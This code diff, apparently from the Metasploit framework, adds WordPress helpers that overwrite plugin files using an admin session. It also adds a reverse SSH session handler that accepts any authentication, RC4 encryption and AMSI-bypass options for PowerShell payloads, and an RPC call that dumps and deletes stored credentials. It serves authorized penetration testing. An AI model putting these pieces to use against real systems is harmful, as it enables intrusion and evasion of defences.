+    unless sock.respond_to?(:put) && sock.respond_to?(:expect)
+      raise ArgumentError, 'sock does not appear to be a socket'
+    end
+
+    if line
+      print_status("Sending: #{line}")
+      sock.put("#{line}#{newline}")
+    end
+
+    return unless pattern
+
+    print_status("Expecting: #{pattern.inspect}")
+    sock.expect(pattern, timeout) do |res|
+      unless res
+        raise Timeout::Error, "Pattern not found: #{pattern.inspect}"
+      end
+
+      vprint_good("Received: #{res.first}")
+    end
+  end
+
+end

lib/msf/core/exploit/http/client.rb

@@ -44,7 +44,9 @@ module Exploit::Remote::HttpClient
         OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']),
         OptFloat.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']),
         OptBool.new('HttpPartialResponses', [false, 'Return partial HTTP responses despite timeouts', false]),
-        OptBool.new('HttpTrace', [false, 'Show the raw HTTP requests and responses', false])
+        OptBool.new('HttpTrace', [false, 'Show the raw HTTP requests and responses', false]),
+        OptBool.new('HttpTraceHeadersOnly', [false, 'Show HTTP headers only in HttpTrace', false]),
+        OptString.new('HttpTraceColors', [false, 'HTTP request and response colors for HttpTrace (unset to disable)', 'red/blu'])
       ], self.class
     )
 
@@ -317,13 +319,18 @@ module Exploit::Remote::HttpClient
 
     begin
       c = connect(opts)
-      r = c.request_raw(opts)
+      r = opts[:cgi] ? c.request_cgi(opts) : c.request_raw(opts)
 
       if datastore['HttpTrace']
+        request_color, response_color =
+          (datastore['HttpTraceColors'] || '').split('/').map { |color| "%bld%#{color}" }
+
+        request = r.to_s(headers_only: datastore['HttpTraceHeaders'])
+
         print_line('#' * 20)
         print_line('# Request:')
         print_line('#' * 20)
-        print_line(r.to_s)
+        print_line("%clr#{request_color}#{request}%clr")
       end
 
       res = c.send_recv(r, actual_timeout)
@@ -332,10 +339,13 @@ module Exploit::Remote::HttpClient
         print_line('#' * 20)
         print_line('# Response:')
         print_line('#' * 20)
-        if res.nil?
-          print_line("No response received")
+
+        if res
+          response = res.to_terminal_output(headers_only: datastore['HttpTraceHeadersOnly'])
+
+          print_line("%clr#{response_color}#{response}%clr")
         else
-          print_line(res.to_terminal_output)
+          print_line('No response received')
         end
       end
 
@@ -362,51 +372,7 @@ module Exploit::Remote::HttpClient
   #
   # @return (see Rex::Proto::Http::Client#send_recv))
   def send_request_cgi(opts={}, timeout = 20, disconnect = true)
-    if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
-      actual_timeout = datastore['HttpClientTimeout']
-    else
-      actual_timeout =  opts[:timeout] || timeout
-    end
-
-    print_line("*" * 20) if datastore['HttpTrace']
-
-    begin
-      c = connect(opts)
-      r = c.request_cgi(opts)
-
-      if datastore['HttpTrace']
-        print_line('#' * 20)
-        print_line('# Request:')
-        print_line('#' * 20)
-        print_line(r.to_s)
-      end
-
-      res = c.send_recv(r, actual_timeout)
-
-      if datastore['HttpTrace']
-        print_line('#' * 20)
-        print_line('# Response:')
-        print_line('#' * 20)
-        if res.nil?
-          print_line("No response received")
-        else
-          print_line(res.to_terminal_output)
-        end
-      end
-
-      disconnect(c) if disconnect
-
-      res
-    rescue ::Errno::EPIPE, ::Timeout::Error => e
-      print_line(e.message) if datastore['HttpTrace']
-      nil
-    rescue Rex::ConnectionError => e
-      vprint_error(e.to_s)
-      nil
-    rescue ::Exception => e
-      print_line(e.message) if datastore['HttpTrace']
-      raise e
-    end
+    send_request_raw(opts.merge(cgi: true), timeout, disconnect)
   end
 
   # Connects to the server, creates a request, sends the request, reads the

lib/msf/core/exploit/http/wordpress/admin.rb

@@ -40,4 +40,54 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin
       return false
     end
   end
+
+  # Edits a plugin file (relative to plugins dir) using a valid admin session.
+  #
+  # @param file [String] The plugin file to edit (relative to plugins dir)
+  # @param contents [String] The plugin file contents to overwrite with
+  # @param cookie [String] A valid admin session cookie
+  # @return [Boolean] true on success, false on error
+  def wordpress_edit_plugin(file, contents, cookie)
+    unless (nonce = wordpress_helper_get_plugin_edit_nonce(cookie, file))
+      vprint_error('Failed to acquire the plugin edit nonce')
+      return false
+    end
+
+    vprint_status("Acquired a plugin edit nonce: #{nonce}")
+
+    # https://github.com/WordPress/WordPress/blob/master/wp-admin/plugin-editor.php
+    res = send_request_cgi(
+      'method'       => 'POST',
+      'uri'          => wordpress_url_admin_plugin_editor,
+      'cookie'       => cookie,
+      'vars_post'    => {
+        'action'     => 'update',
+        '_wpnonce'   => nonce,
+        'file'       => file,
+        'newcontent' => contents
+      }
+    )
+
+    unless res && res.redirect?
+      vprint_error("Server responded with code #{res.code}") if res
+      vprint_error("Failed to edit plugin file #{file}")
+      return false
+    end
+
+    # NOTE: send_request_cgi! doesn't change the method
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => res.redirection.to_s,
+      'cookie' => cookie
+    )
+
+    unless res && res.code == 200 && res.body.include?('edited successfully')
+      vprint_error("Server responded with code #{res.code}") if res
+      vprint_error("Failed to edit plugin file #{file}")
+      return false
+    end
+
+    vprint_status("Edited plugin file #{file}")
+    true
+  end
 end

lib/msf/core/exploit/http/wordpress/helpers.rb

@@ -139,13 +139,13 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
   #
   # @param cookie [String] A valid admin session cookie
   # @return [String,nil] The nonce, nil on error
-  def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil)
+  def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil, vars_get = nil)
     uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php')
     options = {
       'method'    => 'GET',
       'uri'       => uri,
       'cookie'    => cookie,
-      'vars_get'  => { 'tab' => 'upload' }
+      'vars_get'  => vars_get || { 'tab' => 'upload' }
     }
     res = send_request_cgi(options)
     if res && res.code == 200
@@ -155,4 +155,40 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
       return wordpress_helper_get_plugin_upload_nonce(cookie, path)
     end
   end
+
+  # Helper method to retrieve a valid plugin edit nonce.
+  #
+  # @param cookie [String] A valid admin session cookie
+  # @param file [String] The plugin file to edit (relative to plugins dir)
+  # @return [String,nil] The nonce, nil on error
+  def wordpress_helper_get_plugin_edit_nonce(cookie, file)
+    wordpress_helper_get_plugin_upload_nonce(
+      cookie,
+      normalize_uri(wordpress_url_backend, 'plugin-editor.php'),
+      'file' => file
+    )
+  end
+
+  # Helper method to retrieve plugin file contents.
+  #
+  # @param cookie [String] A valid admin session cookie
+  # @param file [String] The plugin file to retrieve (relative to plugins dir)
+  # @return [String,nil] The contents, nil on error
+  def wordpress_helper_get_plugin_file_contents(cookie, file)
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(wordpress_url_backend, 'plugin-editor.php'),
+      'cookie'   => cookie,
+      'vars_get' => {'file' => file}
+    )
+
+    return unless res && res.code == 200
+
+    contents = res.get_html_document.at('//textarea[@name = "newcontent"]')
+
+    return unless contents
+
+    contents.text
+  end
+
 end

lib/msf/core/exploit/http/wordpress/uris.rb

@@ -94,6 +94,13 @@ module Msf::Exploit::Remote::HTTP::Wordpress::URIs
     normalize_uri(wordpress_url_backend, 'update.php')
   end
 
+  # Returns the Wordpress Admin Plugin Editor URL
+  #
+  # @return [String] Wordpress Admin Plugin Editor URL
+  def wordpress_url_admin_plugin_editor
+    normalize_uri(wordpress_url_backend, 'plugin-editor.php')
+  end
+
   # Returns the Wordpress wp-content dir URL
   #
   # @return [String] Wordpress wp-content dir URL

lib/msf/core/exploit/http/wordpress/version.rb

@@ -183,7 +183,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version
       return Msf::Exploit::CheckCode::Detected("Could not identify the version number")
     end
 
-    vprint_status("Found version #{version} of the #{item_type}")
+    vprint_status("Found version #{version} in the #{item_type}")
 
     if fixed_version.nil?
       if vuln_introduced_version.nil?

lib/msf/core/exploit/mixins.rb

@@ -4,10 +4,12 @@
 #
 
 # Behavior
+require 'msf/core/exploit/auto_check'
 require 'msf/core/exploit/check_module'
 require 'msf/core/exploit/brute'
 require 'msf/core/exploit/brutetargets'
 require 'msf/core/exploit/browser_autopwn'
+require 'msf/core/exploit/expect'
 
 # Payload
 require 'msf/core/exploit/egghunter'

lib/msf/core/exploit/postgres.rb

@@ -231,6 +231,7 @@ module Exploit::Remote::Postgres
     begin
       self.postgres_conn = Connection.new(db,username,password,uri)
     rescue RuntimeError => e
+      vprint_error e.to_s
       version_hash = analyze_auth_error e
       return version_hash
     end

lib/msf/core/exploit/powershell.rb

@@ -15,6 +15,7 @@ module Exploit::Powershell
         OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
         OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]),
         OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', false]),
+        OptBool.new('Powershell::exec_rc4', [true, 'Encrypt PSH with RC4', false]),
         OptBool.new('Powershell::remove_comspec', [true, 'Produce script calling powershell directly', false]),
         OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]),
         OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]),
@@ -210,7 +211,9 @@ module Exploit::Powershell
   #   re-execution if the shellcode finishes
   # @option opts [Integer] :prepend_sleep Sleep for the specified time
   #   before executing the payload
+  # @option opts [Integer] :exec_rc4 Encrypt payload with RC4
   # @option opts [Boolean] :prepend_protections_bypass Prepend AMSI/SBL bypass
+  # @option opts [Boolean] :exec_rc4 Encrypt payload with RC4
   # @option opts [String] :method The powershell injection technique to
   #   use: 'net'/'reflection'/'old'
   # @option opts [Boolean] :encode_inner_payload Encodes the powershell
@@ -224,7 +227,7 @@ module Exploit::Powershell
   #
   # @return [String] Powershell command line with payload
   def cmd_psh_payload(pay, payload_arch, opts = {})
-    %i[persist prepend_sleep prepend_protections_bypass exec_in_place encode_final_payload encode_inner_payload
+    %i[persist prepend_sleep prepend_protections_bypass exec_in_place exec_rc4 encode_final_payload encode_inner_payload
     remove_comspec noninteractive wrap_double_quotes no_equals method].map do |opt|
       opts[opt] = datastore["Powershell::#{opt}"] if opts[opt].nil?
     end
@@ -240,6 +243,10 @@ module Exploit::Powershell
     command
   end
 
+  def bypass_powershell_protections
+    Rex::Powershell::PshMethods.bypass_powershell_protections
+  end
+
   #
   # Useful method cache
   #

lib/msf/core/exploit/smb/client/pipe_auditor.rb

@@ -57,7 +57,7 @@ module Exploit::Remote::SMB::Client::PipeAuditor
         return pipe_name, pipe_handle if return_first
 
         @found_pipes << [pipe_name, pipe_handle]
-      rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
+      rescue Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => e
         vprint_error("Inaccessible named pipe: #{pipe_name} - #{e.message}")
       end
     end

lib/msf/core/handler/reverse_ssh.rb

@@ -0,0 +1,160 @@
+# -*- coding: binary -*-
+require 'rex/proto/ssh'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/ssh_command_shell'
+
+module Msf
+module Handler
+
+###
+#
+# This handler implements the SSH tunneling interface.
+#
+###
+module ReverseSsh
+
+  include Msf::Handler
+  include Msf::Handler::Reverse
+
+  #
+  # Returns the string representation of the handler type
+  #
+  def self.handler_type
+    return 'reverse_ssh'
+  end
+
+  #
+  # Returns the connection-described general handler type, in this case
+  # 'tunnel'.
+  #
+  def self.general_handler_type
+    "tunnel"
+  end
+
+  # Initializes the reverse SSH handler and ads the options that are required
+  # for all reverse SSH payloads, like version string and auth params.
+  #
+  def initialize(info = {})
+    super
+    register_options([Opt::LPORT(22)])
+    register_advanced_options(
+      [
+        OptString.new('Ssh::Version', [
+          true,
+          'The SSH version string to provide',
+          Rex::Proto::Ssh::Connection.default_options['local_version']
+        ])
+      ], Msf::Handler::ReverseSsh
+    )
+  end
+
+  # A URI describing where we are listening
+  #
+  # @param addr [String] the address that
+  # @return [String] A URI of the form +ssh://host:port/+
+  def listener_uri(addr=datastore['ReverseListenerBindAddress'])
+    addr = datastore['LHOST'] if addr.nil? || addr.empty?
+    uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr
+    "ssh://#{uri_host}:#{bind_port}"
+  end
+
+  # Create an Ssh listener
+  #
+  # @return [void]
+  def setup_handler
+
+    local_addr = nil
+    local_port = bind_port
+    ex = false
+
+    ssh_opts = Rex::Proto::Ssh::Connection.default_options
+    ssh_opts['local_version'] = datastore['Ssh::Version']
+
+    # Start the SSH server service on this host/port
+    bind_addresses.each do |ip|
+      begin
+        self.service = Rex::ServiceManager.start(Rex::Proto::Ssh::Server,
+          local_port, ip,
+          {
+            'Msf'        => framework,
+            'MsfExploit' => self,
+          },
+          comm,
+          ssh_opts
+        )
+        local_addr = ip
+      rescue
+        ex = $!
+        print_error("Handler failed to bind to #{ip}:#{local_port}")
+      else
+        ex = false
+        break
+      end
+    end
+
+    self.service.on_client_connect_proc = Proc.new {|cli| init_fd_client(cli)}
+    raise ex if (ex)
+
+    print_status("Started SSH reverse handler on #{listener_uri(local_addr)}")
+
+    if datastore['IgnoreUnknownPayloads']
+      print_status("Handler is ignoring unknown payloads")
+    end
+  end
+
+  # Stops the handler & service
+  #
+  # @return [void]
+  def stop_handler
+    if self.service
+      if self.sessions == 0
+        Rex::ServiceManager.stop_service(self.service)
+      end
+    end
+  end
+
+  def init_fd_client(cli)
+    begin
+      Timeout::timeout(5) do
+        while cli.connection.open_channel_keys.empty? do
+          sleep 0.02
+        end
+        fdc = Rex::Proto::Ssh::ChannelFD.new(cli)
+        self.service.clients.push(fdc)
+        create_session(fdc)
+      end
+    rescue Timeout::Error
+      elog("Unable to find channel FDs for client #{cli}")
+    end
+  end
+
+  def create_session(ssh,opts={})
+    # If there is a parent payload, then use that in preference.
+    s = Sessions::SshCommandShell.new(ssh,opts)
+    # Pass along the framework context
+    s.framework = framework
+
+    # Associate this system with the original exploit
+    # and any relevant information
+    s.set_from_exploit(assoc_exploit)
+
+    # If the session is valid, register it with the framework and
+    # notify any waiters we may have.
+    if (s)
+      register_session(s)
+    end
+
+    return s
+  end
+
+  #
+  # Always wait at least 5 seconds for this payload (due to channel delays)
+  #
+  def wfs_delay
+    datastore['WfsDelay'] > 4 ? datastore['WfsDelay'] : 5
+  end
+  attr_accessor :service # :nodoc:
+
+end
+end
+end

lib/msf/core/module/deprecated.rb

@@ -5,7 +5,7 @@ module Msf::Module::Deprecated
   # Additional class methods for deprecated modules
   module ClassMethods
     attr_accessor :deprecation_date
-    attr_accessor :deprecated_name
+    attr_accessor :deprecated_names
 
     # Mark this module as deprecated
     #
@@ -26,12 +26,11 @@ module Msf::Module::Deprecated
 
     # Mark this module as moved from another location. This adds an alias to
     # the module so that it can still be used by its old name and will print a
-    # warning informing the use of the new name. This currently only works for
-    # a single move, but it can be extended in the future for multiple moves.
+    # warning informing the use of the new name.
     #
     # @param from [String] the previous `fullname` of the module
     def moved_from(from)
-      self.deprecated_name = from
+      self.deprecated_names << from
 
       if const_defined?(:Aliases)
         const_get(:Aliases).append from
@@ -42,7 +41,7 @@ module Msf::Module::Deprecated
       # NOTE: aliases are not set until after initialization, so might as well
       # use the block form of alert here too.
       add_warning do
-        if fullname == self.class.deprecated_name
+        if fullname == from
           [ "*%red" + "The module #{fullname} has been moved!".center(88) + "%clr*",
             "*" + "You are using #{realname}".center(88) + "*" ]
         end
@@ -53,5 +52,6 @@ module Msf::Module::Deprecated
   # Extends with {ClassMethods}
   def self.included(base)
     base.extend(ClassMethods)
+    base.deprecated_names = []
   end
 end

lib/msf/core/rpc/v10/rpc_db.rb

@@ -306,6 +306,67 @@ public
   end
 
 
+  # Delete credentials from a specific workspace.
+  #
+  # @param [Hash] xopts Options:
+  # @option xopts [String] :workspace Name of the workspace.
+  # @raise [Msf::RPC::ServerException] You might get one of these errors:
+  #  * 500 ActiveRecord::ConnectionNotEstablished. Try: rpc.call('console.create').
+  #  * 500 Database not loaded. Try: rpc.call('console.create')
+  #  * 500 Invalid workspace.
+  # @return [Hash] Credentials with the following hash key:
+  #  * 'result' [String] A message that says 'success'.
+  #  * 'deleted' [Array<Hash>] An array of credentials. Each hash in the array will have the following:
+  #    * 'user' [String] Username.
+  #    * 'pass' [String] Password.
+  #    * 'updated_at' [Integer] Last updated at.
+  #    * 'type' [String] Password type.
+  #    * 'host' [String] Host.
+  #    * 'port' [Integer] Port.
+  #    * 'proto' [String] Protocol.
+  #    * 'sname' [String] Service name.
+  # @example Here's how you would use this from the client:
+  #  rpc.call('db.del_creds', {})
+  def rpc_del_creds(xopts)
+    ::ActiveRecord::Base.connection_pool.with_connection {
+      deleted = []
+      ret = {}
+      ret[:creds] = []
+      opts, wspace = init_db_opts_workspace(xopts)
+      limit = opts.delete(:limit) || 100
+      offset = opts.delete(:offset) || 0
+      query = Metasploit::Credential::Core.where(
+        workspace_id: wspace
+      ).offset(offset).limit(limit)
+      query.each do |cred|
+        host = ''
+        port = 0
+        proto = ''
+        sname = ''
+        unless cred.logins.empty?
+          login = cred.logins.first
+          host = login.service.host.address.to_s
+          sname = login.service.name.to_s if login.service.name.present?
+          port = login.service.port.to_i
+          proto = login.service.proto.to_s
+        end
+        ret[:creds] << {
+                :user => cred.public.username.to_s,
+                :pass => cred.private.data.to_s,
+                :updated_at => cred.private.updated_at.to_i,
+                :type => cred.private.type.to_s,
+                :host => host,
+                :port => port,
+                :proto => proto,
+                :sname => sname}
+        deleted << ret
+        cred.destroy
+      end
+      return { :result => 'success', :deleted => deleted }
+    }
+  end
+
+
   # Returns information about hosts.
   #
   # @param [Hash] xopts Options:

lib/msf/core/rpc/v10/rpc_module.rb

@@ -402,6 +402,22 @@ class RPC_Module < RPC_Base
     res
   end
 
+  # Returns the total modules in each state.
+  #
+  # @return [Hash] Running module stats that contain the following keys:
+  #  * 'ready' [Integer] The number of modules waiting to be kicked off.
+  #  * 'running' [Integer] The number of modules currently in progress.
+  #  * 'results' [Integer] The number of module run/check results.
+  # @exampleHere's how you would use this from the client:
+  #  rpc.call('module.running_stats')
+  def rpc_running_stats
+    {
+        "ready" => self.framework.ready.size,
+        "running" => self.framework.running.size,
+        "results" => self.framework.results.size,
+    }
+  end
+
 
   # Returns the module's datastore options.
   #
@@ -498,7 +514,7 @@ class RPC_Module < RPC_Base
     when 'exploit'
       _check_exploit(mod, opts)
     when 'auxiliary'
-      _run_auxiliary(mod, opts)
+      _check_auxiliary(mod, opts)
     else
       error(500, "Invalid Module Type: #{mtype}")
     end

lib/msf/core/rpc/v10/rpc_plugin.rb

@@ -41,7 +41,7 @@ class RPC_Plugin < RPC_Base
         return { "result" => "success" }
       end
     rescue ::Exception => e
-      elog("Error loading plugin #{path}: #{e}\n\n#{e.backtrace.join("\n")}", 'core', 0, caller)
+      elog("Error loading plugin #{path}: #{e}\n\n#{e.backtrace.join("\n")}", 'core', 0)
       return { "result" => "failure" }
     end
 

lib/msf/ui/console/command_dispatcher/common.rb

@@ -119,7 +119,7 @@ module Common
       if (p)
         p_opt = Serializer::ReadableText.dump_options(p, '   ')
         print("\nPayload options (#{mod.datastore['PAYLOAD']}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0)
-        print("   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**\n\n") if mod.datastore['DisablePayloadHandler'].to_s == 'true'
+        print("   **DisablePayloadHandler: True   (no handler will be created!)**\n\n") if mod.datastore['DisablePayloadHandler'].to_s == 'true'
       end
     end
 

lib/msf/ui/console/command_dispatcher/core.rb

@@ -754,7 +754,7 @@ class Core
         print_status("Successfully loaded plugin: #{inst.name}")
       end
     rescue ::Exception => e
-      elog("Error loading plugin #{path}: #{e}\n\n#{e.backtrace.join("\n")}", 'core', 0, caller)
+      elog("Error loading plugin #{path}: #{e}\n\n#{e.backtrace.join("\n")}", 'core', 0)
       print_error("Failed to load plugin from #{path}: #{e}")
     end
   end
@@ -1577,13 +1577,19 @@ class Core
     name  = args[0]
     value = args[1, args.length-1].join(' ')
 
-    # Set PAYLOAD by index
+    # Set PAYLOAD
     if name.upcase == 'PAYLOAD' && active_module && (active_module.exploit? || active_module.evasion?)
-      index_from_list(payload_show_results, value) do |mod|
-        return false unless mod && mod.respond_to?(:first)
+      if value.start_with?('/', 'payload/')
+        # Trims starting `/`, `payload/`, `/payload/` from user input
+        value.sub!(%r{^/?(?:payload/)?}, '')
+      else
+        # Checking set PAYLOAD by index
+        index_from_list(payload_show_results, value) do |mod|
+          return false unless mod && mod.respond_to?(:first)
 
-        # [name, class] from payload_show_results
-        value = mod.first
+          # [name, class] from payload_show_results
+          value = mod.first
+        end
       end
     end
 

lib/msf/ui/console/command_dispatcher/modules.rb

@@ -7,6 +7,13 @@ module Msf
     module Console
       module CommandDispatcher
 
+        #
+        # Module Type Shorthands
+        #
+        MODULE_TYPE_SHORTHANDS = {
+          "aux" => Msf::MODULE_AUX
+        }
+
         #
         # {CommandDispatcher} for commands related to background jobs in Metasploit Framework.
         #
@@ -470,6 +477,11 @@ module Msf
               next if search_term.length == 0
               keyword.downcase!
               search_term.downcase!
+
+              if keyword == "type"
+                search_term = MODULE_TYPE_SHORTHANDS[search_term] if MODULE_TYPE_SHORTHANDS.key?(search_term)
+              end
+
               res[keyword] ||=[   [],    []   ]
               if search_term[0,1] == "-"
                 next if search_term.length == 1

lib/msf/ui/console/command_dispatcher/payload.rb

@@ -31,6 +31,7 @@ module Msf
             "-k" => [ false, "Preserve the template behavior and inject the payload as a new thread" ],
             "-o" => [ true,  "The output file name (otherwise stdout)" ],
             "-O" => [ true,  "Deprecated: alias for the '-o' option" ],
+            "-v" => [ false, "Verbose output (display stage in addition to stager)" ],
             "-h" => [ false, "Show this message" ],
           )
 
@@ -96,6 +97,7 @@ module Msf
             template     = nil
             plat         = nil
             keep         = false
+            verbose      = false
 
             @@generate_opts.parse(args) do |opt, _idx, val|
               case opt
@@ -131,6 +133,8 @@ module Msf
                 plat = val
               when '-x'
                 template = val
+              when '-v'
+                verbose = true
               when '-h'
                 cmd_generate_help
                 return false
@@ -161,7 +165,8 @@ module Msf
                 'Template'    => template,
                 'Platform'    => plat,
                 'KeepTemplateWorking' => keep,
-                'Iterations' => iter
+                'Iterations' => iter,
+                'Verbose' => verbose
               )
             rescue
               log_error("Payload generation failed: #{$ERROR_INFO}")
@@ -194,7 +199,8 @@ module Msf
               '-p' => [ true                                              ],
               '-k' => [ nil                                               ],
               '-x' => [ :file                                             ],
-              '-i' => [ true                                              ]
+              '-i' => [ true                                              ],
+              '-v' => [ nil                                               ]
             }
             tab_complete_generic(fmt, str, words)
           end

lib/msf/util/document_generator/normalizer.rb

@@ -67,7 +67,7 @@ module Msf
         EVASION_DEMO_TEMPLATE           = 'evasion_demo_template.erb'
 
         # Special messages
-        NO_CVE_MESSAGE = %Q|CVE: [Not available](https://github.com/rapid7/metasploit-framework/wiki/Why-is-a-CVE-Not-Available%3F)|
+        NO_CVE_MESSAGE = %Q|CVE: [Not available](https://github.com/rapid7/metasploit-framework/wiki/Why-CVE-is-not-available)|
 
 
         # Returns the module document in HTML form.

lib/postgres/postgres-pr/connection.rb

@@ -93,6 +93,9 @@ class Connection
 
         @conn << PasswordMessage.new(m).dump
 
+      when UnknownAuthType
+        raise "unknown auth type '#{msg.auth_type}' with buffer content:\n#{Rex::Text.to_hex_dump(msg.buffer.content)}"
+
       when AuthentificationKerberosV4, AuthentificationKerberosV5, AuthentificationSCMCredential
         raise "unsupported authentification"
 

lib/postgres/postgres-pr/message.rb

@@ -105,11 +105,15 @@ end
 class Authentification < Message
   register_message_type 'R'
 
-  AuthTypeMap = Hash.new { UnknownAuthType }
+  AuthTypeMap = {}
 
   def self.create(buffer)
     buffer.position = 5
     authtype = buffer.read_int32_network
+    unless AuthTypeMap.key? authtype
+      return UnknownAuthType.new(authtype, buffer)
+    end
+
     klass = AuthTypeMap[authtype]
     obj = klass.allocate
     obj.parse(buffer)
@@ -142,6 +146,13 @@ class Authentification < Message
 end
 
 class UnknownAuthType < Authentification
+  attr_reader :auth_type
+  attr_reader :buffer
+
+  def initialize(auth_type, buffer)
+    @auth_type = auth_type
+    @buffer = buffer
+  end
 end
 
 class AuthentificationOk < Authentification 

lib/rex/post/meterpreter/channels/socket_abstraction.rb

@@ -33,7 +33,7 @@ module SocketAbstraction
       _address_family,caddr,_cport = csock.getsockname
       address_family,raddr,_rport = csock.getpeername_as_array
       _maddr,mport = [ channel.params.localhost, channel.params.localport ]
-      [ address_family, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", "#{mport}" ]
+      [ address_family, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", mport ]
     end
 
     def getpeername

lib/rex/proto/http/client_request.rb

@@ -90,8 +90,7 @@ class ClientRequest
     @opts['headers'] ||= {}
   end
 
-  def to_s
-
+  def to_s(headers_only: false)
     # Start GET query string
     qstr = opts['query'] ? opts['query'].dup : ""
 
@@ -202,7 +201,9 @@ class ClientRequest
     req << set_content_len_header(pstr.length)
     req << set_chunked_header
     req << opts['raw_headers']
-    req << set_body(pstr)
+    req << set_body(pstr) unless headers_only
+
+    req
   end
 
   protected

lib/rex/proto/http/packet.rb

@@ -166,22 +166,22 @@ class Packet
   #
   # Outputs a readable string of the packet for terminal output
   #
-  def to_terminal_output
-    output_packet(true)
+  def to_terminal_output(headers_only: false)
+    output_packet(true, headers_only: headers_only)
   end
 
   #
   # Converts the packet to a string.
   #
-  def to_s
-    output_packet(false)
+  def to_s(headers_only: false)
+    output_packet(false, headers_only: headers_only)
   end
 
   #
   # Converts the packet to a string.
   # If ignore_chunk is set the chunked encoding is omitted (for pretty print)
   #
-  def output_packet(ignore_chunk=false)
+  def output_packet(ignore_chunk = false, headers_only: false)
     content = self.body.to_s.dup
 
     # Update the content length field in the header with the body length.
@@ -220,7 +220,9 @@ class Packet
     end
 
     str  = self.headers.to_s(cmd_string)
-    str += content || ''
+    str += content || '' unless headers_only
+
+    str
   end
 
   #

lib/rex/proto/proxy/socks5/server_client.rb

@@ -247,7 +247,7 @@ module Socks5
       setup_tcp_relay
       response              = ResponsePacket.new
       response.command      = REPLY_SUCCEEDED
-      response.address      = @rsock.getlocalname[HOST]
+      response.address      = @rsock.getlocalname[HOST].split('-')[-1]
       response.port         = @rsock.getlocalname[PORT]
       response
     end

lib/rex/proto/ssh.rb

@@ -0,0 +1,4 @@
+# encoding: binary
+
+# SSH server support
+require 'rex/proto/ssh/server'

lib/rex/proto/ssh/connection.rb

@@ -0,0 +1,340 @@
+# -*- coding: binary -*-
+require 'rex/proto/ssh/hrr_rb_ssh'
+
+module Rex
+module Proto
+module Ssh
+
+##
+# Whitelist-based access control scaffold
+##
+module AccessControlList
+
+  #
+  # Add permitted access control entry to access control list
+  # Create ACL if it does not yet exist
+  #
+  # @param host [String] Host/hostname for which to grant access
+  # @param port [Integer] Port for which to grant access
+  # @param bind [TrueClass,FalseClass] Whether this ACE is for servers
+  #
+  def permit=(host, port, bind = false)
+    @acl ||= { bind:[], connect:[] }
+    unless permit?(host, port, bind)
+      @acl[ bind ? :bind : :connect ] << "#{host}:#{port}"
+    end
+  end
+
+  #
+  # Delete permitted access control entry from access control list
+  #
+  # @param host [String] Host/hostname for which to grant access
+  # @param port [Integer] Port for which to grant access
+  # @param bind [TrueClass,FalseClass] Whether this ACE is for servers
+  #
+  def deny=(host, port, bind = false)
+    @acl[ bind ? :bind : :connect ].select! do |ent|
+      ent != "#{host}:#{port}"
+    end if @acl
+  end
+
+  #
+  # Check if access control entry exists in access control list
+  #
+  # @param host [String] Host/hostname for which to check access
+  # @param port [Integer] Port for which to check access
+  # @param bind [TrueClass,FalseClass] Whether this ACE is for servers
+  #
+  # @return [TrueClass,FalseClass] Permission boolean for access
+  def permit?(host, port, bind = false)
+    @acl and ["#{host}:#{port}", "*:*", "#{host}:*", "*:#{port}"].any? do |m|
+      @acl[ bind ? :bind : :connect ].include?(m)
+    end
+  end
+end
+
+##
+# Encapsulation of Connection constructor for Rex use
+# Provides ACLs for port forwarding and client (io) access hooks
+##
+class Connection < ::HrrRbSsh::Connection
+  include AccessControlList
+  def self.default_options
+    noneauth = HrrRbSsh::Authentication::Authenticator.new { |context| true }
+    return {
+      'authentication_none_authenticator' => noneauth,
+      'authentication_password_authenticator' => noneauth,
+      'authentication_publickey_authenticator' => noneauth,
+      'authentication_keyboard_interactive_authenticator' => noneauth,
+      'local_version' => 'SSH-2.0-RexProtoSsh'
+    }
+  end
+  #
+  # Create new Connection from an IO and options set, pull trans
+  # and auth from options if present, create from options set otherwise.
+  #
+  # Creates a default empty handler set for channel requests.
+  #
+  # @param io [IO] Socket, FD, or abstraction on which to build Connection
+  # @param options [Hash] Options for constructing Connection components
+  #
+  # @return [Rex::Proto::Ssh::Connection] a new connection object
+  def initialize(io = nil, options = self.default_options, context = {})
+    @context = context
+    @logger = Logger.new self.class.name
+    @server = options.delete(:ssh_server)
+    # Take a pre-built transport from the options or build one on the fly
+    @transport = options.delete(:ssh_transport) || HrrRbSsh::Transport.new(
+      io,
+      options.delete(:ssh_mode) || :server,
+      options
+    )
+    # Take a pre-built authentication from the options or build one on the fly
+    @authentication = options.delete(:ssh_authentication) ||
+      HrrRbSsh::Authentication.new(@transport, options)
+    @global_request_handler = GlobalRequestHandler.new(self)
+    # Retain remaining options for later use
+    @options = options
+
+    @channels = Hash.new
+    @username = nil
+    @closed = nil
+  end
+
+  #
+  # Provide keys of explicitly not closed channels
+  #
+  # @param ctype [String] Channel type to select, nil for all
+  #
+  # @return [Array] Array of integers indexing open channels
+  def open_channel_keys(ctype = 'session')
+    channels.keys.sort.select do |cn|
+      channels[cn].closed? === false and (
+        ctype.nil? or channels[cn].channel_type == ctype
+      )
+    end
